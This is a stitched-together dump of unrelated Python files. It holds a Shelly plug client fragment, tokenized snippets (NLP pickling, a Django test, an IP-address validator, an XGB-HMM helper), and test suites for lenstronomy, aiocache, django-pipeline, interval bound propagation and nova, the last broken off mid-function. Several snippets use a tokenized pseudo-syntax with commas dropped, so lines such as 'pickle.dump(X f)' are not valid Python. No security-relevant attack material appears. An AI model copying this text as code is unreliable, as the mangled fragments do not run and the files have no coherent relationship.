timeout=self.timeout)<block_end><except_stmt>requests.RequestException<block_start>_LOGGER.debug("Connection could not be 
established")<line_sep><continue><block_end><if_stmt>response.status_code<ne>200<block_start>_LOGGER.debug(f"Unexpected status code {response.status_code}")<line_sep><continue><block_end>_LOGGER.debug(f"Shelly API version {api.api_version} detected")<line_sep><return>api<block_end><raise>ConnectionError("Could not connect to Shelly Plug")<block_end><block_end>
# Text Classifiation using NLP # Importing the libraries <import_stmt>numpy<as>np<import_stmt>re<import_stmt>pickle<import_stmt>nltk<import_from_stmt>nltk.corpus stopwords<import_from_stmt>sklearn.datasets load_files<line_sep>nltk.download('stopwords')<line_sep># Importing the dataset reviews=load_files('txt_sentoken/')<line_sep>X,y=reviews.data reviews.target<line_sep># Pickling the dataset <with_stmt>open('X.pickle' 'wb')<as>f<block_start>pickle.dump(X f)<block_end><with_stmt>open('y.pickle' 'wb')<as>f<block_start>pickle.dump(y f)<block_end># Unpickling dataset X_in=open('X.pickle' 'rb')<line_sep>y_in=open('y.pickle' 'rb')<line_sep>X=pickle.load(X_in)<line_sep>y=pickle.load(y_in)<line_sep>
<import_from_stmt>django.test TestCase Client<import_from_stmt>django.contrib.auth.models User<import_from_stmt>.models Feed<class_stmt>FeedViewsTest(TestCase)<block_start><def_stmt>setUp self<block_start>self.client=Client()<line_sep>user=User.objects.create_user(username='test_user' email='<EMAIL>' password='<PASSWORD>')<line_sep>self.feed=Feed.objects.create(user=user post='test feed')<block_end><def_stmt>test_feeds self<block_start>response=self.client.get('/feeds/')<line_sep>self.assertEqual(response.status_code 200)<block_end><def_stmt>test_feed self<block_start>response=self.client.get('/feeds/123/')<line_sep>self.assertEqual(response.status_code 404)<line_sep>response=self.client.get(f'/feeds/{self.feed.pk}/')<line_sep>self.assertEqual(response.status_code 200)<block_end><block_end>
# Time: O(1) # Space: O(1) <import_stmt>string<class_stmt>Solution(object)<block_start><def_stmt>validIPAddress self IP<block_start>""" :type IP: str :rtype: str """<line_sep>blocks=IP.split('.')<if_stmt>len(blocks)<eq>4<block_start><for_stmt>i xrange(len(blocks))<block_start><if_stmt><not>blocks[i].isdigit()<or><not>0<le>int(blocks[i])<l>256<or>(blocks[i][0]<eq>'0'<and>len(blocks[i])<g>1)<block_start><return>"Neither"<block_end><block_end><return>"IPv4"<block_end>blocks=IP.split(':')<if_stmt>len(blocks)<eq>8<block_start><for_stmt>i xrange(len(blocks))<block_start><if_stmt><not>(1<le>len(blocks[i])<le>4)<or><not>all(c<in>string.hexdigits<for>c blocks[i])<block_start><return>"Neither"<block_end><block_end><return>"IPv6"<block_end><return>"Neither"<block_end><block_end>
__author__ = 'sibirrer'

import unittest

import numpy as np
import numpy.testing as npt
import pytest

import lenstronomy.Util.image_util as image_util
import lenstronomy.Util.util as util


def test_add_layer2image_odd_odd():
    """Delta kernel lands at the requested pixel, including near the edges."""
    grid2d = np.zeros((101, 101))
    kernel = np.zeros((21, 21))
    kernel[10, 10] = 1
    added = image_util.add_layer2image(grid2d, 50, 50, kernel, order=0)
    assert added[50, 50] == 1
    assert added[49, 49] == 0
    added = image_util.add_layer2image(grid2d, 70, 95, kernel, order=0)
    assert added[95, 70] == 1
    added = image_util.add_layer2image(grid2d, 20, 45, kernel, order=0)
    assert added[45, 20] == 1
    added = image_util.add_layer2image(grid2d, 45, 20, kernel, order=0)
    assert added[20, 45] == 1
    added = image_util.add_layer2image(grid2d, 20, 55, kernel, order=0)
    assert added[55, 20] == 1
    added = image_util.add_layer2image(grid2d, 20, 100, kernel, order=0)
    assert added[100, 20] == 1
    # half-pixel x offset with linear interpolation splits the flux evenly
    added = image_util.add_layer2image(grid2d, 20.5, 100, kernel, order=1)
    assert added[100, 20] == 0.5
    assert added[100, 21] == 0.5


def test_add_layer2image_int():
    """Integer-position kernel addition; off-grid position is a no-op."""
    grid2d = np.zeros((7, 7))
    kernel = np.ones((3, 3))
    added = image_util.add_layer2image_int(grid2d, 4, 1, kernel)
    print(added)
    assert added[0, 0] == 0
    assert added[0, 3] == 1
    added = image_util.add_layer2image_int(grid2d, 14, 1, kernel)
    print(added)
    npt.assert_almost_equal(grid2d, added, decimal=9)


def test_add_background():
    image = np.ones((10, 10))
    sigma_bkgd = 1.
    image_noisy = image_util.add_background(image, sigma_bkgd)
    # a 3-sigma statistical bound on the summed noise
    assert abs(np.sum(image_noisy)) < np.sqrt(np.sum(image) * sigma_bkgd) * 3


def test_add_poisson():
    image = np.ones((100, 100))
    exp_time = 100.
    poisson = image_util.add_poisson(image, exp_time)
    assert abs(np.sum(poisson)) < np.sqrt(np.sum(image) / exp_time) * 10


def test_findOverlap():
    x_mins = [0, 1, 0]
    y_mins = [1, 2, 1]
    x_mins, y_mins = image_util.findOverlap(x_mins, y_mins, 0.5)
    print(x_mins, y_mins)
    assert x_mins[0] == 0
    assert y_mins[0] == 1
    assert len(x_mins) == 2


def test_coordInImage():
    x_coord = [100, 20, -10]
    y_coord = [0, -30, 5]
    x_result, y_result = image_util.coordInImage(x_coord, y_coord, 50, 1)
    assert x_result == -10
    assert y_result == 5


def test_rebin_coord_transform():
    """Rebinned coordinate transforms agree with directly built coarse grids."""
    # case 1: 3x3 grid binned by 3 vs. a 1x1 grid at triple pixel size
    (x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0,
     Mpix2coord, Mcoord2pix) = util.make_grid_with_coordtransform(
        numPix=3, deltapix=0.03, subgrid_res=1)
    (x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re,
     y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re) = util.make_grid_with_coordtransform(
        numPix=1, deltapix=0.09, subgrid_res=1)
    (ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized,
     y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized) = image_util.rebin_coord_transform(
        3, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
    assert ra_at_xy_0_resized == ra_at_xy_0_re
    assert dec_at_xy_0_resized == dec_at_xy_0_re
    assert x_at_radec_0_resized == x_at_radec_0_re
    assert y_at_radec_0_resized == y_at_radec_0_re
    npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
    npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)

    # case 2: 100x100 grid binned by 2 vs. a 50x50 grid
    (x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0,
     Mpix2coord, Mcoord2pix) = util.make_grid_with_coordtransform(
        numPix=100, deltapix=0.05, subgrid_res=1)
    (x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re,
     y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re) = util.make_grid_with_coordtransform(
        numPix=50, deltapix=0.1, subgrid_res=1)
    (ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized,
     y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized) = image_util.rebin_coord_transform(
        2, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
    assert ra_at_xy_0_resized == ra_at_xy_0_re
    assert dec_at_xy_0_resized == dec_at_xy_0_re
    assert x_at_radec_0_resized == x_at_radec_0_re
    assert y_at_radec_0_resized == y_at_radec_0_re
    npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
    npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)

    # case 3: 99x99 grid binned by 3 vs. a 33x33 grid
    (x_grid, y_grid, ra_at_xy_0, dec_at_xy_0, x_at_radec_0, y_at_radec_0,
     Mpix2coord, Mcoord2pix) = util.make_grid_with_coordtransform(
        numPix=99, deltapix=0.1, subgrid_res=1)
    (x_grid, y_grid, ra_at_xy_0_re, dec_at_xy_0_re, x_at_radec_0_re,
     y_at_radec_0_re, Mpix2coord_re, Mcoord2pix_re) = util.make_grid_with_coordtransform(
        numPix=33, deltapix=0.3, subgrid_res=1)
    assert x_at_radec_0 == 49
    (ra_at_xy_0_resized, dec_at_xy_0_resized, x_at_radec_0_resized,
     y_at_radec_0_resized, Mpix2coord_resized, Mcoord2pix_resized) = image_util.rebin_coord_transform(
        3, x_at_radec_0, y_at_radec_0, Mpix2coord, Mcoord2pix)
    assert x_at_radec_0_resized == 16
    npt.assert_almost_equal(ra_at_xy_0_resized, ra_at_xy_0_re, decimal=8)
    npt.assert_almost_equal(dec_at_xy_0_resized, dec_at_xy_0_re, decimal=8)
    npt.assert_almost_equal(x_at_radec_0_resized, x_at_radec_0_re, decimal=8)
    npt.assert_almost_equal(y_at_radec_0_resized, y_at_radec_0_re, decimal=8)
    npt.assert_almost_equal(Mcoord2pix_resized[0][0], Mcoord2pix_re[0][0], decimal=8)
    npt.assert_almost_equal(Mpix2coord_re[0][0], Mpix2coord_resized[0][0], decimal=8)

    # round trip pixel -> coordinate -> pixel on the original transform
    x_in, y_in = 10., 10.
    ra, dec = util.map_coord2pix(x_in, y_in, ra_at_xy_0, dec_at_xy_0, Mpix2coord)
    x_out, y_out = util.map_coord2pix(ra, dec, x_at_radec_0, y_at_radec_0, Mcoord2pix)
    assert x_in == x_out
    assert y_in == y_out

    # and on the rebinned transform
    x_in, y_in = 10., 10.
    ra, dec = util.map_coord2pix(x_in, y_in, ra_at_xy_0_resized, dec_at_xy_0_resized, Mpix2coord_resized)
    x_out, y_out = util.map_coord2pix(ra, dec, x_at_radec_0_resized, y_at_radec_0_resized, Mcoord2pix_resized)
    assert x_in == x_out
    assert y_in == y_out


def test_rotateImage():
    img = np.zeros((5, 5))
    img[2, 2] = 1
    img[1, 2] = 0.5
    # full turn: image unchanged
    im_rot = image_util.rotateImage(img, 360)
    npt.assert_almost_equal(im_rot[1, 2], 0.5, decimal=10)
    npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
    npt.assert_almost_equal(im_rot[2, 1], 0., decimal=10)
    # half turn
    im_rot = image_util.rotateImage(img, 360. / 2)
    npt.assert_almost_equal(im_rot[1, 2], 0., decimal=10)
    npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
    npt.assert_almost_equal(im_rot[3, 2], 0.5, decimal=10)
    # quarter turn
    im_rot = image_util.rotateImage(img, 360. / 4)
    npt.assert_almost_equal(im_rot[1, 2], 0., decimal=10)
    npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
    npt.assert_almost_equal(im_rot[2, 1], 0.5, decimal=10)
    # eighth turn: interpolated flux values
    im_rot = image_util.rotateImage(img, 360. / 8)
    npt.assert_almost_equal(im_rot[1, 2], 0.23931518624017051, decimal=10)
    npt.assert_almost_equal(im_rot[2, 2], 1., decimal=10)
    npt.assert_almost_equal(im_rot[2, 1], 0.23931518624017073, decimal=10)


def test_re_size_array():
    numPix = 9
    kernel = np.zeros((numPix, numPix))
    kernel[int((numPix - 1) / 2), int((numPix - 1) / 2)] = 1
    subgrid_res = 2
    x_in = np.linspace(0, 1, numPix)
    x_out = np.linspace(0, 1, numPix * subgrid_res)
    kernel_out = image_util.re_size_array(x_in, x_in, kernel, x_out, x_out)
    assert kernel_out[int((numPix * subgrid_res - 1) / 2), int((numPix * subgrid_res - 1) / 2)] == 0.58477508650519028


def test_symmetry_average():
    image = np.zeros((5, 5))
    image[2, 3] = 1
    img_sym = image_util.symmetry_average(image, 2)
    npt.assert_almost_equal(img_sym[2, 1], 0.5, decimal=10)


def test_cut_edges():
    image = np.zeros((51, 51))
    image[25][25] = 1
    resized = image_util.cut_edges(image, 21)
    nx, ny = resized.shape
    assert nx == 21
    assert ny == 21
    assert resized[10][10] == 1

    image = np.zeros((5, 5))
    image[2, 2] = 1
    image_cut = image_util.cut_edges(image, 3)
    assert len(image_cut) == 3
    assert image_cut[1, 1] == 1

    image = np.zeros((6, 6))
    image[3, 2] = 1
    image_cut = image_util.cut_edges(image, 4)
    assert len(image_cut) == 4
    assert image_cut[2, 1] == 1

    image = np.zeros((6, 8))
    image[3, 2] = 1
    image_cut = image_util.cut_edges(image, 4)
    assert len(image_cut) == 4
    assert image_cut[2, 0] == 1


def test_re_size():
    grid = np.zeros((200, 100))
    grid[100, 50] = 4
    # factor 2 averages 2x2 blocks: 4 / 4 = 1
    grid_small = image_util.re_size(grid, factor=2)
    assert grid_small[50][25] == 1
    grid_same = image_util.re_size(grid, factor=1)
    npt.assert_equal(grid_same, grid)


def test_stack_images():
    numPix = 10
    image1 = np.ones((numPix, numPix))
    image2 = np.ones((numPix, numPix)) / 10.
    wht1 = np.ones((numPix, numPix))
    wht2 = np.ones((numPix, numPix)) * 10
    image_stacked, wht_stacked, sigma_stacked = image_util.stack_images(
        image_list=[image1, image2], wht_list=[wht1, wht2], sigma_list=[0.1, 0.2])
    assert sigma_stacked == 0.19306145983268458
    assert image_stacked[0, 0] == 0.18181818181818182
    assert wht_stacked[0, 0] == 5.5


def test_rebin_image():
    # even grid: bins divide the image exactly
    numPix = 10
    bin_size = 2
    image = np.ones((numPix, numPix))
    wht_map = np.ones((numPix, numPix)) * 10
    idex_mask = np.ones((numPix, numPix))
    sigma_bkg = 0.1
    ra_coords, dec_coords = util.make_grid(numPix, deltapix=0.05)
    ra_coords = util.array2image(ra_coords)
    dec_coords = util.array2image(dec_coords)
    (image_resized, wht_map_resized, sigma_bkg_resized, ra_coords_resized,
     dec_coords_resized, idex_mask_resized) = image_util.rebin_image(
        bin_size, image, wht_map, sigma_bkg, ra_coords, dec_coords, idex_mask)
    assert image_resized[0, 0] == 4
    assert wht_map_resized[0, 0] == wht_map[0, 0]
    assert sigma_bkg_resized == 0.2
    assert ra_coords_resized[0, 0] == -0.2

    # odd grid: edges must be handled before rebinning
    numPix = 11
    bin_size = 2
    image = np.ones((numPix, numPix))
    wht_map = np.ones((numPix, numPix)) * 10
    idex_mask = np.ones((numPix, numPix))
    sigma_bkg = 0.1
    ra_coords, dec_coords = util.make_grid(numPix, deltapix=0.05)
    ra_coords = util.array2image(ra_coords)
    dec_coords = util.array2image(dec_coords)
    (image_resized, wht_map_resized, sigma_bkg_resized, ra_coords_resized,
     dec_coords_resized, idex_mask_resized) = image_util.rebin_image(
        bin_size, image, wht_map, sigma_bkg, ra_coords, dec_coords, idex_mask)
    assert image_resized[0, 0] == 4
    assert wht_map_resized[0, 0] == wht_map[0, 0]
    assert sigma_bkg_resized == 0.2
    npt.assert_almost_equal(ra_coords_resized[0, 0], -0.225, decimal=8)


def test_radial_profile():
    from lenstronomy.LightModel.Profiles.gaussian import Gaussian
    gauss = Gaussian()
    x, y = util.make_grid(11, 1)
    flux = gauss.function(x, y, sigma=10, amp=1)
    data = util.array2image(flux)
    profile_r = image_util.radial_profile(data, center=[5, 5])
    profile_r_true = gauss.function(np.linspace(0, stop=7, num=8), 0, sigma=10, amp=1)
    npt.assert_almost_equal(profile_r, profile_r_true, decimal=3)


def test_gradient_map():
    image = np.zeros((6, 8))
    grad = image_util.gradient_map(image)
    npt.assert_almost_equal(grad, image, decimal=6)
    # a constant image also has zero gradient everywhere
    image_ones = np.ones((6, 8))
    grad = image_util.gradient_map(image_ones)
    npt.assert_almost_equal(grad, image, decimal=6)
    assert np.shape(grad) == np.shape(image)


class TestRaise(unittest.TestCase):
    """Invalid inputs must raise ValueError."""

    def test_raise(self):
        with self.assertRaises(ValueError):
            image_util.add_layer2image_int(np.zeros((7, 7)), 4, 1, np.ones((2, 2)))
        with self.assertRaises(ValueError):
            image_util.re_size(np.ones((5, 5)), factor=2)
        with self.assertRaises(ValueError):
            image_util.re_size(np.ones((5, 5)), factor=0.5)
        with self.assertRaises(ValueError):
            image_util.cut_edges(np.ones((5, 5)), numPix=7)
        with self.assertRaises(ValueError):
            image_util.cut_edges(np.ones((5, 6)), numPix=3)
        with self.assertRaises(ValueError):
            image_util.cut_edges(np.ones((5, 5)), numPix=2)


if __name__ == '__main__':
    pytest.main()
<import_stmt>numpy<as>np<import_from_stmt>public_tool.form_index form_index<import_from_stmt>XGB_HMM.form_B_matrix_by_XGB form_B_matrix_by_XGB<import_from_stmt>XGB_HMM.predict self_pred<def_stmt>pred_proba_XGB A model pi O allow_flag lengths# 对dataset形成pred_proba,注意这里的dataset是solve_on_raw_data后的结果,即附带allow_flag的数据 # output: # pred_proba:数组类型 <block_start>n_states=len(pi)<line_sep>pred_proba=np.zeros((O.shape[0] n_states))<for_stmt>i range(len(lengths))<block_start>begin_index,end_index=form_index(lengths i)<line_sep>now_O=O[begin_index:end_index :]<line_sep>now_allow_flag=allow_flag[begin_index:end_index]<line_sep>now_pred_proba=np.zeros((now_O.shape[0] n_states))<line_sep>now_allow_B=form_B_matrix_by_XGB(model now_O[now_allow_flag<eq>1] pi)<line_sep>_,now_allow_pred_proba,_=self_pred(now_allow_B [now_allow_B.shape[0]] A pi)<line_sep>now_pred_proba[now_allow_flag<eq>1]=now_allow_pred_proba<line_sep>pred_proba[begin_index:end_index]=now_pred_proba<block_end><return>pred_proba<block_end>
<import_from_future_stmt> unicode_literals<import_from_stmt>django.db models# noqa # Create your models here.
<import_from_stmt>typing TYPE_CHECKING<if_stmt>TYPE_CHECKING# import modules that have public classes/functions <block_start><import_from_stmt>pandas.io.formats style<line_sep># and mark only those modules as public __all__=["style"]<block_end>
import pytest
import asynctest

from aiocache.base import BaseCache, API
from aiocache import caches, RedisCache, MemcachedCache
from aiocache.plugins import BasePlugin
from aiocache.serializers import BaseSerializer


def pytest_configure():
    """
    Before pytest_namespace was being used to set the keys for testing but the
    feature was removed
    https://docs.pytest.org/en/latest/deprecations.html#pytest-namespace
    """
    pytest.KEY = "key"
    pytest.KEY_1 = "random"


@pytest.fixture(autouse=True)
def reset_caches():
    """Restore the default in-memory cache configuration before every test."""
    caches.set_config(
        {
            "default": {
                "cache": "aiocache.SimpleMemoryCache",
                "serializer": {"class": "aiocache.serializers.NullSerializer"},
            }
        }
    )


class MockCache(BaseCache):
    """BaseCache with every backend operation replaced by a CoroutineMock."""

    _MOCKED = (
        "_add", "_get", "_gets", "_set", "_multi_set", "_delete",
        "_exists", "_increment", "_expire", "_clear", "_raw",
        "_redlock_release", "acquire_conn", "release_conn", "_close",
    )

    def __init__(self):
        super().__init__()
        for name in self._MOCKED:
            setattr(self, name, asynctest.CoroutineMock())
        # _multi_get needs a list-shaped return value for callers that unpack it
        self._multi_get = asynctest.CoroutineMock(return_value=["a", "b"])


@pytest.fixture
def mock_cache(mocker):
    cache = MockCache()
    cache.timeout = 0.002
    mocker.spy(cache, "_build_key")
    # spy on every public API command plus close
    for cmd in API.CMDS:
        mocker.spy(cache, cmd.__name__)
    mocker.spy(cache, "close")
    cache.serializer = asynctest.Mock(spec=BaseSerializer)
    cache.serializer.encoding = "utf-8"
    cache.plugins = [asynctest.Mock(spec=BasePlugin)]
    return cache


@pytest.fixture
def base_cache():
    return BaseCache()


@pytest.fixture
def redis_cache():
    return RedisCache()


@pytest.fixture
def memcached_cache():
    return MemcachedCache()
from django.contrib.staticfiles import finders
from django.contrib.staticfiles.storage import staticfiles_storage
from django.core.management import call_command
from django.test import TestCase
from django.test.utils import modify_settings, override_settings

from pipeline.collector import default_collector
from pipeline.storage import PipelineStorage

from tests.tests.test_compiler import DummyCompiler
from tests.utils import pipeline_settings

from io import StringIO


class PipelineNoPathStorage(PipelineStorage):
    """Storage without an implemented path method."""

    def path(self, *args):
        raise NotImplementedError()

    def delete(self, *args):
        return

    def exists(self, *args):
        return True

    def save(self, *args):
        return

    def open(self, *args):
        return StringIO()

    def listdir(self, *args):
        return []


class DummyCSSCompiler(DummyCompiler):
    """Handles css files."""

    output_extension = 'css'

    def match_file(self, path):
        return path.endswith('.css')


class StorageTest(TestCase):
    def tearDown(self):
        # Reset the cached staticfiles storage so settings overridden by a
        # test don't bleed into the next one.
        staticfiles_storage._setup()

    @pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None)
    def test_post_process_dry_run(self):
        default_collector.collect()
        processed_files = PipelineStorage().post_process({}, True)
        # A dry run must not process anything.
        self.assertEqual(list(processed_files), [])

    @pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None,
                       COMPILERS=['tests.tests.test_storage.DummyCSSCompiler'])
    def test_post_process(self):
        default_collector.collect()
        storage = PipelineStorage()
        processed_files = storage.post_process({})
        self.assertTrue(('screen.css', 'screen.css', True) in processed_files)
        self.assertTrue(('scripts.js', 'scripts.js', True) in processed_files)

    @override_settings(
        STATICFILES_STORAGE='tests.tests.test_storage.PipelineNoPathStorage')
    @pipeline_settings(JS_COMPRESSOR=None, CSS_COMPRESSOR=None,
                       COMPILERS=['tests.tests.test_storage.DummyCSSCompiler'])
    def test_post_process_no_path(self):
        """
        Test post_process with a storage that doesn't implement the path
        method.
        """
        staticfiles_storage._setup()
        try:
            call_command('collectstatic', verbosity=0, interactive=False)
        except NotImplementedError:
            self.fail('Received an error running collectstatic')

    @modify_settings(
        STATICFILES_FINDERS={'append': 'pipeline.finders.PipelineFinder'})
    def test_nonexistent_file_pipeline_finder(self):
        path = finders.find('nothing.css')
        self.assertIsNone(path)

    @modify_settings(
        STATICFILES_FINDERS={'append': 'pipeline.finders.CachedFileFinder'})
    def test_nonexistent_file_cached_finder(self):
        path = finders.find('nothing.css')
        self.assertIsNone(path)

    @modify_settings(
        STATICFILES_FINDERS={'append': 'pipeline.finders.PipelineFinder'})
    def test_nonexistent_double_extension_file_pipeline_finder(self):
        path = finders.find('app.css.map')
        self.assertIsNone(path)

    @modify_settings(
        STATICFILES_FINDERS={'append': 'pipeline.finders.CachedFileFinder'})
    def test_nonexistent_double_extension_file_cached_finder(self):
        path = finders.find('app.css.map')
        self.assertIsNone(path)
# coding=utf-8
# Copyright 2019 The Interval Bound Propagation Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for loss."""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import interval_bound_propagation as ibp
import sonnet as snt
import tensorflow.compat.v1 as tf


class FixedNN(snt.AbstractModule):
    """A linear layer with fixed weights so the test is deterministic."""

    def _build(self, z0, is_training=False):
        # All weights 1, biases [0, 1] -> logits are always [l, l + 1].
        self._m = snt.Linear(
            2,
            initializers={
                'w': tf.constant_initializer(1.),
                'b': lambda *unused_args, **unused_kwargs: tf.constant(
                    [0., 1.]),
            })
        return self._m(z0)


class LossTest(tf.test.TestCase):

    def testEndToEnd(self):
        predictor = ibp.VerifiableModelWrapper(FixedNN())
        # Labels.
        labels = tf.constant([1], dtype=tf.int64)
        # Connect to input.
        z = tf.constant([[1, 2, 3]], dtype=tf.float32)
        predictor(z, is_training=True)
        # Input bounds.
        eps = 1.
        input_bounds = ibp.IntervalBounds(z - eps, z + eps)
        predictor.propagate_bounds(input_bounds)
        # Create output specification (that forces the first logits to be
        # greater).
        c = tf.constant([[[1, -1]]], dtype=tf.float32)
        d = tf.constant([[0]], dtype=tf.float32)
        # Turn elision off for more interesting results.
        spec = ibp.LinearSpecification(c, d, collapse=False)
        # Create an attack.
        attack = ibp.UntargetedPGDAttack(
            predictor, spec, eps, num_steps=1, input_bounds=(-100., 100))
        # Build loss.
        losses = ibp.Losses(predictor, spec, attack,
                            interval_bounds_loss_type='hinge',
                            interval_bounds_hinge_margin=0.)
        losses(labels)

        with self.test_session() as sess:
            sess.run(tf.global_variables_initializer())
            # We expect the worst-case logits from IBP to be [9, 4].
            # The adversarial attack should fail since logits are always
            # [l, l + 1]. Similarly, the nominal predictions are correct.
            accuracy_values, loss_values = sess.run(
                [losses.scalar_metrics, losses.scalar_losses])
            self.assertAlmostEqual(1., accuracy_values.nominal_accuracy)
            self.assertAlmostEqual(0., accuracy_values.verified_accuracy)
            self.assertAlmostEqual(1., accuracy_values.attack_accuracy)
            expected_xent = 0.31326168751822947
            self.assertAlmostEqual(expected_xent,
                                   loss_values.nominal_cross_entropy,
                                   places=5)
            self.assertAlmostEqual(expected_xent,
                                   loss_values.attack_cross_entropy,
                                   places=5)
            expected_hinge = 5.
            self.assertAlmostEqual(expected_hinge, loss_values.verified_loss)


if __name__ == '__main__':
    tf.test.main()
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import datetime

from oslo_utils.fixture import uuidsentinel as uuids

from nova.compute import instance_list
from nova import context
from nova.db.main import api as db
from nova import exception
from nova import objects
from nova import test


class InstanceListTestCase(test.TestCase):
    NUMBER_OF_CELLS = 3

    def setUp(self):
        super(InstanceListTestCase, self).setUp()

        self.context = context.RequestContext('fake', 'fake')
        self.num_instances = 3
        self.instances = []

        start = datetime.datetime(1985, 10, 25, 1, 21, 0)
        dt = start
        spread = datetime.timedelta(minutes=10)

        self.cells = objects.CellMappingList.get_all(self.context)
        # Create three instances in each of the real cells. Leave the
        # first cell empty to make sure we don't break with an empty one.
        for cell in self.cells[1:]:
            for i in range(0, self.num_instances):
                with context.target_cell(self.context, cell) as cctx:
                    inst = objects.Instance(
                        context=cctx,
                        project_id=self.context.project_id,
                        user_id=self.context.user_id,
                        created_at=start,
                        launched_at=dt,
                        instance_type_id=i,
                        hostname='%s-inst%i' % (cell.name, i))
                    inst.create()
                    if i % 2 == 0:
                        # Make some faults for this instance
                        for n in range(0, i + 1):
                            msg = 'fault%i-%s' % (n, inst.hostname)
                            f = objects.InstanceFault(
                                context=cctx,
                                instance_uuid=inst.uuid,
                                code=i,
                                message=msg,
                                details='fake',
                                host='fakehost')
                            f.create()
                self.instances.append(inst)
                im = objects.InstanceMapping(
                    context=self.context,
                    project_id=inst.project_id,
                    user_id=inst.user_id,
                    instance_uuid=inst.uuid,
                    cell_mapping=cell)
                im.create()
                dt += spread

    def test_get_sorted(self):
        filters = {}
        limit = None
        marker = None
        columns = []
        sort_keys = ['uuid']
        sort_dirs = ['asc']
        obj, insts = instance_list.get_instances_sorted(
            self.context, filters, limit, marker, columns,
            sort_keys, sort_dirs)
        uuids = [inst['uuid'] for inst in insts]
        self.assertEqual(sorted(uuids), uuids)
        self.assertEqual(len(self.instances), len(uuids))

    def test_get_sorted_descending(self):
        filters = {}
        limit = None
        marker = None
        columns = []
        sort_keys = ['uuid']
        sort_dirs = ['desc']
        obj, insts = instance_list.get_instances_sorted(
            self.context, filters, limit, marker, columns,
            sort_keys, sort_dirs)
        uuids = [inst['uuid'] for inst in insts]
        self.assertEqual(list(reversed(sorted(uuids))), uuids)
        self.assertEqual(len(self.instances), len(uuids))

    def test_get_sorted_with_filter(self):
        filters = {'instance_type_id': 1}
        limit = None
        marker = None
        columns = []
        sort_keys = ['uuid']
        sort_dirs = ['asc']
        obj, insts = instance_list.get_instances_sorted(
            self.context, filters, limit, marker, columns,
            sort_keys, sort_dirs)
        uuids = [inst['uuid'] for inst in insts]
        expected = [inst['uuid'] for inst in self.instances
                    if inst['instance_type_id'] == 1]
        self.assertEqual(list(sorted(expected)), uuids)

    def test_get_sorted_by_defaults(self):
        filters = {}
        limit = None
        marker = None
        columns = []
        sort_keys = None
        sort_dirs = None
        obj, insts = instance_list.get_instances_sorted(
            self.context, filters, limit, marker, columns,
            sort_keys, sort_dirs)
        uuids = set([inst['uuid'] for inst in insts])
        expected = set([inst['uuid'] for inst in self.instances])
        self.assertEqual(expected, uuids)

    def test_get_sorted_with_limit(self):
        obj, insts = instance_list.get_instances_sorted(
            self.context, {}, 5, None, [], ['uuid'], ['asc'])
        uuids = [inst['uuid'] for inst in insts]
        had_uuids = [inst.uuid for inst in self.instances]
        self.assertEqual(sorted(had_uuids)[:5], uuids)
        self.assertEqual(5, len(uuids))

    def test_get_sorted_with_large_limit(self):
        obj, insts = instance_list.get_instances_sorted(
            self.context, {}, 5000, None, [], ['uuid'], ['asc'])
        uuids = [inst['uuid'] for inst in insts]
        self.assertEqual(sorted(uuids), uuids)
        self.assertEqual(len(self.instances), len(uuids))

    def test_get_sorted_with_large_limit_batched(self):
        obj, insts = instance_list.get_instances_sorted(
            self.context, {}, 5000, None, [], ['uuid'], ['asc'],
            batch_size=2)
        uuids = [inst['uuid'] for inst in insts]
        self.assertEqual(sorted(uuids), uuids)
        self.assertEqual(len(self.instances), len(uuids))

    def _test_get_sorted_with_limit_marker(self, sort_by, pages=2,
                                           pagesize=2, sort_dir='asc'):
        """Get multiple pages by a sort key and validate the results.

        This requests $pages of $pagesize, followed by a final page with
        no limit, and a final-final page which should be empty. It
        validates that we got a consistent set of results no patter where
        the page boundary is, that we got all the results after the
        unlimited query, and that the final page comes back empty when we
        use the last instance as a marker.
        """
        insts = []

        page = 0
        while True:
            if page >= pages:
                # We've requested the specified number of limited (by
                # pagesize) pages, so request a penultimate page with no
                # limit which should always finish out the result.
                limit = None
            else:
                # Request a limited-size page for the first $pages pages.
                limit = pagesize

            if insts:
                # If we're not on the first page, use the last instance we
                # received as the marker
                marker = insts[-1]['uuid']
            else:
                # No marker for the first page
                marker = None

            batch = list(instance_list.get_instances_sorted(
                self.context, {}, limit, marker, [], [sort_by],
                [sort_dir])[1])
            if not batch:
                # This should only happen when we've pulled the last empty
                # page because we used the marker of the last instance. If
